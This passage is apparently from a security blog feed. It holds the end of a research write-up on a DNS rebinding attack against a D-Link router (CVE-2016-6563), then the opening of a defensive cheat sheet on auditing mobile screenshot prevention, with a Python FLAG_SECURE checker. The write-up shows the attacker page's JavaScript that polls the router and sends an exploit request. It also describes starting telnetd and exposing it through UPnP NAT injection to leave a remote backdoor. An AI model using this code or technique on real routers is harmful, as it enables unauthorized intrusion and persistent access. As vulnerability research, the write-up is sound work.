#9fbad5;">i</span>] <span class="cm-operator" style="box-sizing: border-box;">=</span> <span class="cm-variable-2" style="box-sizing: border-box; color: #9fbad5;">body</span>.<span class="cm-property" style="box-sizing: border-box;">charCodeAt</span>(<span class="cm-variable-2" style="box-sizing: border-box; color: #9fbad5;">i</span>); </span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-2" style="box-sizing: border-box; color: #9fbad5;">xhr</span>.<span class="cm-property" style="box-sizing: border-box;">send</span>(<span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">new</span> <span class="cm-variable" style="box-sizing: border-box;">Blob</span>([<span class="cm-variable-2" style="box-sizing: border-box; color: #9fbad5;">aBody</span>]));</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> }</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">var</span> <span class="cm-def" style="box-sizing: border-box; color: #8d8df0;">trigger</span> <span class="cm-operator" style="box-sizing: border-box;">=</span> <span class="cm-atom" style="box-sizing: border-box; color: #84b6cb;">true</span>;</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">function</span> <span class="cm-def" style="box-sizing: border-box; color: #8d8df0;">start</span>() {</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">jQuery</span>.<span class="cm-property" style="box-sizing: border-box;">ajax</span> 
({</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-property" style="box-sizing: border-box;">url</span>: <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"/info/Login.html"</span>,</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-property" style="box-sizing: border-box;">type</span>: <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"GET"</span>,</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-property" style="box-sizing: border-box;">data</span>: <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">""</span>,</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> }).<span class="cm-property" style="box-sizing: border-box;">always</span>(<span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">function</span> (<span class="cm-def" style="box-sizing: border-box; color: #8d8df0;">data</span>,<span class="cm-def" style="box-sizing: border-box; color: #8d8df0;">status</span>){</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">console</span>.<span class="cm-property" style="box-sizing: border-box;">log</span>(<span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"[+] Checking SOP bypass..."</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">if</span>(<span class="cm-variable" style="box-sizing: border-box;">trigger</span> <span class="cm-operator" style="box-sizing: border-box;">&&</span> <span class="cm-variable-2" style="box-sizing: border-box; color: #9fbad5;">data</span>.<span class="cm-property" style="box-sizing: 
border-box;">includes</span>(<span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"<title>D-LINK</title>"</span>)){</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">console</span>.<span class="cm-property" style="box-sizing: border-box;">log</span>(<span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"[+] Sending Exploit..."</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">exploit</span>();</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">trigger</span> <span class="cm-operator" style="box-sizing: border-box;">=</span> <span class="cm-atom" style="box-sizing: border-box; color: #84b6cb;">false</span>;</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> }<span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">else</span>{</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">console</span>.<span class="cm-property" style="box-sizing: border-box;">log</span>(<span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"[+] Waiting..."</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> }</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> });</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> }</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">function</span> <span class="cm-def" style="box-sizing: border-box; 
color: #8d8df0;">poll</span>() {</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">setTimeout</span>(<span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">function</span> () {</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">if</span>(<span class="cm-variable" style="box-sizing: border-box;">trigger</span>){</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">start</span>();</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">poll</span>();</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> }<span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">else</span>{</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">console</span>.<span class="cm-property" style="box-sizing: border-box;">log</span>(<span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"[+] Exploit sent..."</span>)</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> }</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> }, <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">6000</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> }</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="box-sizing: border-box; 
padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">$</span>(<span class="cm-variable" style="box-sizing: border-box;">document</span>).<span class="cm-property" style="box-sizing: border-box;">ready</span>(<span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">function</span> () {</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">poll</span>();</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> });</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;"></</span><span class="cm-tag" style="box-sizing: border-box; color: #7df46a;">script</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;"></</span><span class="cm-tag" style="box-sizing: border-box; color: #7df46a;">head</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;"><</span><span class="cm-tag" style="box-sizing: border-box; color: #7df46a;">body</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;"><</span><span class="cm-tag" 
style="box-sizing: border-box; color: #7df46a;">h1</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">></span>DNS Rebinding Attack against Dlink Router CVE-XXXXX<span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;"></</span><span class="cm-tag" style="box-sizing: border-box; color: #7df46a;">h1</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;"><</span><span class="cm-tag" style="box-sizing: border-box; color: #7df46a;">br</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">><</span><span class="cm-tag" style="box-sizing: border-box; color: #7df46a;">br</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">><</span><span class="cm-tag" style="box-sizing: border-box; color: #7df46a;">br</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;"><</span><span class="cm-tag" style="box-sizing: border-box; color: #7df46a;">marquee</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">></span>Insert here something...<span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;"></</span><span class="cm-tag" style="box-sizing: border-box; color: #7df46a;">marquee</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;"></</span><span class="cm-tag" style="box-sizing: 
border-box; color: #7df46a;">body</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;"></</span><span class="cm-tag" style="box-sizing: border-box; color: #7df46a;">html</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span></span></pre><span style="font-family: helvetica;"><div><span style="font-family: helvetica;">Below is the screenshot showing the execution of the <i>xhr</i> request after the successful <i>DNS Rebinding</i> attack.</span></div><div><span style="font-family: helvetica;">The exploit was successfully executed and the "testJS" file was created on the filesystem of the router.</span></div><div><span style="font-family: helvetica;"><br /></span></div><div style="text-align: center;"><span id="docs-internal-guid-fe155cc8-7fff-8289-0f94-35b1ea8312bd"><img height="172" src="https://lh6.googleusercontent.com/leubTyJ0ntk7VNyq9qnw3ecIvgy8pUsmDUzNKSYHVhMGWIMNWcCCTJCrRGvO86Fj5V4lA_4BwmytjJab8TuiWCTPk11xnu68gveS3UujPtDNrZtu17GVtp1iQYxzDYCX_jKbuK_o2NM=w320-h172" width="320" /></span></div><br /><br /></span></div><div><span style="font-family: helvetica;">The following diagram shows the complete <i>DNS Rebinding</i> attack scheme.</span><p cid="n94" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; font-size: 16px; line-height: inherit; margin-bottom: 1.5rem; margin-top: 0px; orphans: 4; overflow-wrap: break-word; position: relative; white-space: pre-wrap;"></p><div class="separator" style="clear: both; text-align: center;"><a 
href="https://1.bp.blogspot.com/-8Lrxd-1VER0/YH76iiJdq0I/AAAAAAAAABU/JcytQ5XcerYnjtdBEB7ySHX-OT2s1hBIQCLcBGAsYHQ/s1031/rop_diagram.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: helvetica;"><img border="0" data-original-height="662" data-original-width="1031" height="205" src="https://1.bp.blogspot.com/-8Lrxd-1VER0/YH76iiJdq0I/AAAAAAAAABU/JcytQ5XcerYnjtdBEB7ySHX-OT2s1hBIQCLcBGAsYHQ/w320-h205/rop_diagram.png" width="320" /></span></a></div><p cid="n94" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; font-size: 16px; line-height: inherit; margin-bottom: 1.5rem; margin-top: 0px; orphans: 4; overflow-wrap: break-word; position: relative; white-space: pre-wrap;"><span style="font-family: helvetica;"><br /></span></p><h4 style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span><span style="font-family: helvetica; white-space: pre-wrap;"><b><br /></b></span></span></h4><h4 style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span><span style="font-family: helvetica; white-space: pre-wrap;"><b>Getting Persistence using DNS Rebinding + UPnP NAT Injection + <i>telnetd</i> service</b></span></span></h4><p style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="font-family: helvetica;"><br /></span></p><p style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="font-family: helvetica;">The next step for an attacker would be to create a backdoor in order to get persistent access to the victim's device.</span></p><span style="font-family: helvetica;"><br />During the static firmware analysis we noticed the existence of "/usr/sbin/telnetd" within the firmware, so we could force the router to run the <i>telnetd</i> service just by replacing its path in the working exploit. 
</span></div><div><span style="font-family: helvetica;"><br /></span></div><div><span style="font-family: helvetica;">The generated HTTP request is shown below.</span></div><div><span style="font-family: helvetica;"><br /></span></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-JF6kxyfsdl0/YImNNQ0h6-I/AAAAAAAAABs/0LUssnx8LYogCBOq9EHn_-oYzwikFJRMQCLcBGAsYHQ/s1217/Screenshot_20210428_182757.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: helvetica;"><img border="0" data-original-height="259" data-original-width="1217" src="https://1.bp.blogspot.com/-JF6kxyfsdl0/YImNNQ0h6-I/AAAAAAAAABs/0LUssnx8LYogCBOq9EHn_-oYzwikFJRMQCLcBGAsYHQ/s16000/Screenshot_20210428_182757.png" /></span></a></div><span style="font-family: helvetica;"><br /><br />The service was started on the device, as shown by the following <i>nmap</i> output taken before and after the exploit execution.</span></div><div><span style="font-family: helvetica;"><br /></span></div><div><span style="font-family: helvetica;">Telnet service status before the exploit execution:</span></div><div><span style="font-family: helvetica;"><br /></span></div><div><span style="font-family: helvetica;"><div class="separator" style="clear: both; text-align: center;"><a href="https://lh3.googleusercontent.com/-mGvtiQBYH6k/YQQdwY-1RBI/AAAAAAAAAEk/_BJQ72Uuz0Ia3YrF6KR84NdQGHi8nZVjACLcBGAsYHQ/image.png" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="252" data-original-width="933" height="86" src="https://lh3.googleusercontent.com/-mGvtiQBYH6k/YQQdwY-1RBI/AAAAAAAAAEk/_BJQ72Uuz0Ia3YrF6KR84NdQGHi8nZVjACLcBGAsYHQ/image.png" width="320" /></a></div><br /><br /></span><p cid="n94" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; font-size: 16px; line-height: inherit; margin-bottom: 1.5rem; margin-top: 0px; overflow-wrap: break-word; position: relative; white-space: 
pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box; font-family: helvetica;">Telnet service started after the exploit execution:</span></p><p cid="n94" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; font-size: 16px; line-height: inherit; margin-bottom: 1.5rem; margin-top: 0px; overflow-wrap: break-word; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box; font-family: helvetica;"></span></p><div class="separator" style="clear: both; text-align: center;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box; font-family: helvetica;"><a href="https://lh3.googleusercontent.com/-Fv5cuUPF9MU/YQQeFFyZnvI/AAAAAAAAAEs/fi7C74UrmFIIzdDB9xXqruoalaKhUoGTQCLcBGAsYHQ/image.png" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="250" data-original-width="911" height="88" src="https://lh3.googleusercontent.com/-Fv5cuUPF9MU/YQQeFFyZnvI/AAAAAAAAAEs/fi7C74UrmFIIzdDB9xXqruoalaKhUoGTQCLcBGAsYHQ/image.png" width="320" /></a></span></div><p></p><p cid="n94" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; font-size: 16px; line-height: inherit; margin-bottom: 1.5rem; margin-top: 0px; overflow-wrap: break-word; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box; font-family: helvetica;"></span></p><div class="separator" style="clear: both; text-align: center;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box; font-family: helvetica;"><a href="https://lh3.googleusercontent.com/-YL2v9UJ0ubM/YQQeJdfoBFI/AAAAAAAAAEw/MqhaKelVYVUeeou6hxM5QmtEMNvwlcjaQCLcBGAsYHQ/image.png" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="326" data-original-width="1079" height="97" 
src="https://lh3.googleusercontent.com/-YL2v9UJ0ubM/YQQeJdfoBFI/AAAAAAAAAEw/MqhaKelVYVUeeou6hxM5QmtEMNvwlcjaQCLcBGAsYHQ/image.png" width="320" /></a></span></div><span class="md-plain" md-inline="plain" style="box-sizing: border-box; font-family: helvetica;"><br /></span><p></p><h4 style="box-sizing: border-box; font-size: 16px; line-height: inherit; margin-bottom: 1.5rem; margin-top: 0px; overflow-wrap: break-word; position: relative; text-align: left; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box; font-family: helvetica;">Conclusion</span></h4><p style="box-sizing: border-box; line-height: inherit; margin-bottom: 1.5rem; margin-top: 0px; overflow-wrap: break-word; position: relative; text-align: left;"></p><div><span style="font-family: helvetica; font-size: 16px; white-space: pre-wrap;">We were able to use the <i>DNS Rebinding</i> attack against </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2016-6563" style="font-family: helvetica; font-size: 16px; white-space: pre-wrap;" target="_blank">CVE-2016-6563</a> <span style="font-family: helvetica; font-size: 16px; orphans: 4; white-space: pre-wrap;">proving that it is possible to achieve Remote Command Execution against a service that is not publicly exposed, such as the web interface of a router.</span></div></div><div><span style="font-family: helvetica; font-size: 16px; orphans: 4; white-space: pre-wrap;"><br /></span></div><div><span style="font-family: helvetica; font-size: 16px; orphans: 4; white-space: pre-wrap;">Moreover, we have used the <i>UPnP</i> <i>NAT Injection</i> technique from the </span><a href="https://blog.mindedsecurity.com/2021/02/journey-into-beauty-of-dnsrebinding.html" style="font-family: helvetica;" target="_blank">first</a> <span style="font-family: helvetica; font-size: 16px; orphans: 4; white-space: pre-wrap;">part to expose the <i>telnetd</i> service on the public interface in order to obtain a remote backdoor.</span></div><div><p></p><p cid="n94" 
class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; line-height: inherit; margin-bottom: 1.5rem; margin-top: 0px; orphans: 4; overflow-wrap: break-word; position: relative;"><span style="font-family: helvetica;"><span style="white-space: pre-wrap;">Below is the Attack Tree of the proposed attack:</span></span></p><p cid="n94" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; line-height: inherit; margin-bottom: 1.5rem; margin-top: 0px; orphans: 4; overflow-wrap: break-word; position: relative;"><span style="font-family: helvetica;"></span></p><div class="separator" style="clear: both; text-align: center;"><span style="font-family: helvetica;"><a href="https://1.bp.blogspot.com/-GIJHLg9xXsU/YKU1jprlCEI/AAAAAAAAACM/aJA5ejcEpvcQRqFfyj6-Ta2eQrxX9BtEQCLcBGAsYHQ/s698/Screenshot_20210519_175741.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="581" data-original-width="698" height="408" src="https://1.bp.blogspot.com/-GIJHLg9xXsU/YKU1jprlCEI/AAAAAAAAACM/aJA5ejcEpvcQRqFfyj6-Ta2eQrxX9BtEQCLcBGAsYHQ/w490-h408/Screenshot_20210519_175741.png" width="490" /></a></span></div><span style="font-family: helvetica;"><br /></span><p></p><h4 style="box-sizing: border-box; break-after: avoid-page; break-inside: avoid; clear: both; letter-spacing: -1px; line-height: 1.875rem; margin: 0px 0px 1.5rem; orphans: 4; overflow-wrap: break-word; padding: 0px; position: relative; text-align: left; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box; font-family: helvetica;"><span style="font-size: small;">References</span>:</span></h4><p cid="n97" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; line-height: inherit; margin-bottom: 1.5rem; margin-top: 0px; orphans: 4; overflow-wrap: break-word; position: relative;"></p><ul style="text-align: left;"><li><span style="white-space: pre-wrap;"><a 
href="https://eu.dlink.com/uk/en/support/support-news/2016/november/10/routers-hnap-service-stack-based-buffer-overflow-vulnerability">https://eu.dlink.com/uk/en/support/support-news/2016/november/10/routers-hnap-service-stack-based-buffer-overflow-vulnerability</a></span></li><li><span style="white-space: pre-wrap;"><a href="https://packetstormsecurity.com/files/139611/D-Link-DIR-Routers-HNAP-Login-Stack-Buffer-Overflow.html">https://packetstormsecurity.com/files/139611/D-Link-DIR-Routers-HNAP-Login-Stack-Buffer-Overflow.html</a></span></li><li><span style="white-space: pre-wrap;"><a href="https://www.rapid7.com/db/modules/exploit/linux/http/dlink_hnap_bof/">https://www.rapid7.com/db/modules/exploit/linux/http/dlink_hnap_bof/</a></span></li></ul><p></p></div><h4><b><span style="font-family: helvetica;">Authors</span></b></h4><div><span style="font-family: helvetica;">Alessandro Braccio</span></div><div><span style="font-family: helvetica;">Giovanni Guido</span></div></div>Anonymousnoreply@blogger.com0tag:blogger.com,1999:blog-7122745763234660283.post-32072627701264590952021-05-27T06:54:00.003-07:002021-05-27T06:55:50.907-07:00Mobile Screenshot Prevention Cheatsheet - Testing and Fixing<style>
.post ul li {
list-style: circle inside;
margin-left: 20px;
margin-bottom: 0px;
font-size: 14px;
}
.post blockquote{
box-sizing: border-box;
color: rgb(102, 102, 102);
display: inline;
padding: 10px 10px 10px 10px;
font-family: Poppins, sans-serif;
font-size: 14px;
font-stretch: 100%;
font-style: italic;
font-variant-caps: normal;
font-variant-east-asian: normal;
font-variant-ligatures: normal;
font-variant-numeric: normal;
font-weight: 300;
height: auto;
line-height: 28px;
overflow-wrap: break-word;
text-align: left;
text-size-adjust: 100%;
width: auto;
word-break: break-word;
-webkit-tap-highlight-color: rgba(0, 0, 0, 0);
background: #EDEDED;
}
</style>
<h1 style="line-height: 1.38; margin-bottom: 3pt; margin-top: 0pt;">
Mobile Screenshot Prevention Cheat Sheet - Testing and Fixing
</h1>
<div>
<div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhKkaHBQr1Q_NduSGmMgU2g3AfrKQIy-Sa1vWprMpoDXzTXxq3DiOt5U2jcJ7vRe3CagBzuGOO0hjh9gBXJ905gdCwCJqeoQ0EPqHtKuAkRo1dOzpyk9zOZanlVUcaKxifgyTDR6x8Vjod/" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img alt="" data-original-height="512" data-original-width="512" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhKkaHBQr1Q_NduSGmMgU2g3AfrKQIy-Sa1vWprMpoDXzTXxq3DiOt5U2jcJ7vRe3CagBzuGOO0hjh9gBXJ905gdCwCJqeoQ0EPqHtKuAkRo1dOzpyk9zOZanlVUcaKxifgyTDR6x8Vjod/" width="240" /></a></div><br /></div><br />This article explains how to test
mobile applications against any screenshot prevention mechanism they
implement, and then proposes mitigations to the problem according
to the context.
</div>
<div><br /></div>
<div>
The following article is the second part of <b><a href="https://blog.mindedsecurity.com/2020/10/mobile-screenshot-prevention.html">Mobile Screenshot Prevention Cheat Sheet - Risks and Scenarios</a> </b>published on <a href="https://blog.mindedsecurity.com/">IMQ Minded Security blog.</a></div>
<div><br /></div><div><b>TLDR</b>; None of the proposed solutions provides full protection against screenshotting. Therefore all of them should be considered mitigations.</div><div><br /></div><div><h2>Auditing Screenshot Prevention</h2></div>
<div>
In this section we will focus on testing for, and preventing, mobile screenshots
in both a static context (e.g. a secure code review or a reverse engineering task
on a mobile application) and a dynamic one (e.g. testing a mobile application in
its execution environment).
</div>
<div><br /></div>
<div><span style="background-color: white;"><u>First things first: a</u></span><span style="background-color: white;">nyone approaching mobile application security </span><span style="background-color: white;">should carefully read the </span><span style="background-color: white;">OWASP Mobile Security Testing Guide (MSTG)<a href="https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06d-testing-data-storage#testing-auto-generated-screenshots-for-sensitive-information-mstg-storage-9" target="_blank">[1]</a><a href="https://mobile-security.gitbook.io/mobile-security-testing-guide/android-testing-guide/0x05d-testing-data-storage#finding-sensitive-information-in-auto-generated-screenshots-mstg-storage-9" target="_blank">[2]</a></span><span style="background-color: white;">.</span></div><div><br /></div><div><h4 style="text-align: left;">Static Analysis</h4></div><div>Assume we have the source code of a mobile application and have to
check whether the app implements any mitigation against screenshot attacks,
either user or system generated. </div><div>What should we look for?
</div><div><br /></div>
<h3 style="text-align: left;">Android</h3>
<div>
The usual remediation is to set <span style="font-family: courier;">FLAG_SECURE</span> on the window's LayoutParams, hence the first step is to search for it in the codebase. </div><div>However, if we are
working on source code decompiled from a packaged application, the
<span style="font-family: courier;">FLAG_SECURE</span> symbol may have been
<i>obfuscated</i> or <i>replaced</i> with its integer value.
</div><div><br /></div><div>Therefore, the values to search for are:</div>
<div>
<ul style="text-align: left;">
<li>
<span style="font-family: courier;">FLAG_SECURE</span> (high level symbol)
</li>
<li>8192 (numeric value)</li>
<li>0x00002000 (hexadecimal numeric value)</li>
</ul>
<div>
If any of those values is found, it must be checked whether it is actually applied to the <a href="https://developer.android.com/reference/android/view/WindowManager.LayoutParams" target="_blank">WindowManager LayoutParams</a> of the Activity window.
</div><div><br /></div>
</div>
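<div>
The following Python script is an added example (not code from the article) that automates the static check above over a decompiled source tree: it lists every Activity declared in <span style="font-family: courier;">AndroidManifest.xml</span> and reports whether <span style="font-family: courier;">FLAG_SECURE</span>, in any of the three spellings, is actually applied through a <span style="font-family: courier;">setFlags</span>/<span style="font-family: courier;">addFlags</span> call or a write to <span style="font-family: courier;">LayoutParams.flags</span>. The manifest and sources it runs on are constructed samples; the <span style="font-family: courier;">.flags</span> assignment form and the comment stripping are heuristics assumed by this example, not listed by the article.
</div>

```python
"""Audit decompiled Android sources for FLAG_SECURE, one Activity at a time.
Added example for this article (not the article's or any project's code): it
lists the Activities declared in AndroidManifest.xml and checks each one's
source for FLAG_SECURE (or 8192 / 0x00002000) applied via a flag-setting call."""
import re
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
# The three spellings of FLAG_SECURE an auditor has to search for.
FLAG_SECURE_PATTERNS = (
    re.compile(r"\bFLAG_SECURE\b"),
    re.compile(r"\b8192\b"),
    re.compile(r"\b0x0*2000\b", re.IGNORECASE),
)

def mentions_flag_secure(text):
    return any(p.search(text) for p in FLAG_SECURE_PATTERNS)

def strip_comments(src):
    """Drop /* */ and // comments so a commented-out call is not counted."""
    src = re.sub(r"/\*.*?\*/", "", src, flags=re.S)
    return re.sub(r"//[^\n]*", "", src)

def call_args(src, open_paren):
    """Text between the '(' at open_paren and its matching ')' (multi-line safe)."""
    depth = 0
    for i in range(open_paren, len(src)):
        if src[i] == "(":
            depth += 1
        elif src[i] == ")":
            depth -= 1
            if depth == 0:
                return src[open_paren + 1:i]
    return src[open_paren + 1:]

def flag_secure_applied(source):
    """True if FLAG_SECURE is set on the window; clearFlags() and comments don't count."""
    src = strip_comments(source)
    for m in re.finditer(r"\b(setFlags|addFlags)\s*\(", src):
        if mentions_flag_secure(call_args(src, m.end() - 1)):
            return True
    # Direct write to LayoutParams.flags, e.g. `lp.flags |= 0x00002000`
    for m in re.finditer(r"\.flags\s*\|?=(?!=)\s*([^;\n]+)", src):
        if mentions_flag_secure(m.group(1)):
            return True
    return False

def declared_activities(manifest_xml):
    """Fully qualified class name of every <activity> in the manifest."""
    root = ET.fromstring(manifest_xml)
    package = root.get("package", "")
    names = []
    for act in root.iter("activity"):
        name = act.get(ANDROID_NS + "name")
        if name is None:
            continue
        if name.startswith("."):
            name = package + name
        elif "." not in name:
            name = package + "." + name
        names.append(name)
    return names

def audit(manifest_xml, sources):
    """Activity -> True (flag set) / False (not set) / None (no source found)."""
    report = {}
    for name in declared_activities(manifest_xml):
        src = sources.get(name)
        report[name] = None if src is None else flag_secure_applied(src)
    return report

# Constructed sample manifest and decompiled sources (HelpActivity has no source).
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.wallet">
  <application>
    <activity android:name=".LoginActivity"/>
    <activity android:name=".BalanceActivity"/>
    <activity android:name="com.example.wallet.SettingsActivity"/>
    <activity android:name=".HelpActivity"/>
  </application>
</manifest>"""

SAMPLE_SOURCES = {
    # Kotlin, symbolic flag, call split over several lines
    "com.example.wallet.LoginActivity": """window.setFlags(
            WindowManager.LayoutParams.FLAG_SECURE,
            WindowManager.LayoutParams.FLAG_SECURE
        )""",
    # Decompiled Java: the constant was replaced by its decimal value
    "com.example.wallet.BalanceActivity": "getWindow().addFlags(8192);",
    # Flag only cleared and mentioned in a comment: NOT protected
    "com.example.wallet.SettingsActivity": """// TODO: set FLAG_SECURE
        getWindow().clearFlags(WindowManager.LayoutParams.FLAG_SECURE);""",
}

if __name__ == "__main__":
    for activity, state in audit(SAMPLE_MANIFEST, SAMPLE_SOURCES).items():
        print(activity, {True: "FLAG_SECURE set", False: "MISSING", None: "no source"}[state])
```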
<div>
Note that this flag must be set in every Android <i>Activity</i>
